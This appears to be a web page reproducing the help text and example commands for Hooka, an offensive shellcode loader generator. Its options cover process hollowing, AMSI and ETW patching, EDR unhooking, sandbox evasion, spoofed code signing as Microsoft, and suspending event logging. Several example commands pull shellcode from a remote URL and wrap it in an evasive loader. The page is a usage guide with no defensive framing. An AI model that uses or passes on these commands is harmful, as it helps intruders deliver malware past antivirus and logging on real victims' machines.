多种功能的 Shellcode 加载器生成器 Hooka- Hooka

Usage of Hooka:  REQUIRED:-i, --input string        payload to inject in raw format, as PE, as DLL or from a URL    -o, --output string       name of output file (i.e. loader.exe)    -f, --format string       format of the payload to generate (available: exe, dll) (default exe)  EXECUTION:    --proc string      process to spawn (in suspended state) when needed for given execution technique (default notepad.exe)    --exec string      technique used to load shellcode (default "SuspendedProcess"):                         SuspendedProcess                         ProcessHollowing                         NtCreateThreadEx                         EtwpCreateEtwThread                         NtQueueApcThreadEx                         No-RWX  AUXILIARY:    -a, --arch string       architecture of the loader to generate (default amd64)    -c, --cert string       certificate to sign generated loader with (i.e. cert.pfx)    -d, --domain string     domain used to sign loader (i.e. www.microsoft.com)  ENCODING:    --enc string         encrypts shellcode using given algorithm (available: aes, 3des, rc4, xor) (default none)    --sgn                use Shikata Ga Nai to encode generated loader (it must be installed on path)    --strings            obfuscate strings using Caesar cipher  EVASION:    --unhook string         unhooking technique to use (available: full, peruns)    --sandbox               enable sandbox evasion    --no-amsi               don't patch AMSI    --no-etw                don't patch ETW    --hashing               use hashes to retrieve function pointers    --user string           proceed only when the user running the loader is the expected (i.e. DESKTOP-E1D6G0Aadmin)    --computername string   proceed only when the computer name is the expected (i.e. DESKTOP-E1D6G0A)    --acg                   enable ACG Guard to prevent AV/EDR from modifying existing executable code    --blockdlls             prevent non-Microsoft signed DLLs from injecting in child processes    --phantom               suspend EventLog threads using Phant0m technique. High privileges needed, otherwise loader skips this step    --sleep                 delay shellcode execution using a custom sleep function  EXTRA:    --calc              use a calc.exe shellcode to test loader capabilities (don't provide input file)    --compress          compress generated loader using Golang compiler and UPX if it's installed    -r, --rand          use a random set of parameters to create a random loader (just for testing purposes)    -v, --verbose       enable verbose to print extra information    -h, --help          print help panelExamples:  hooka -i shellcode.bin -o loader.exe  hooka -i http://192.168.1.126/shellcode.bin -o loader.exe  hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg  hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose

$ hooka_linux_amd64 -i shellcode.bin -o loader.exe

$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll

$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose$ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0Atom" --computername "DESKTOP-E1D6G0A" --compress --strings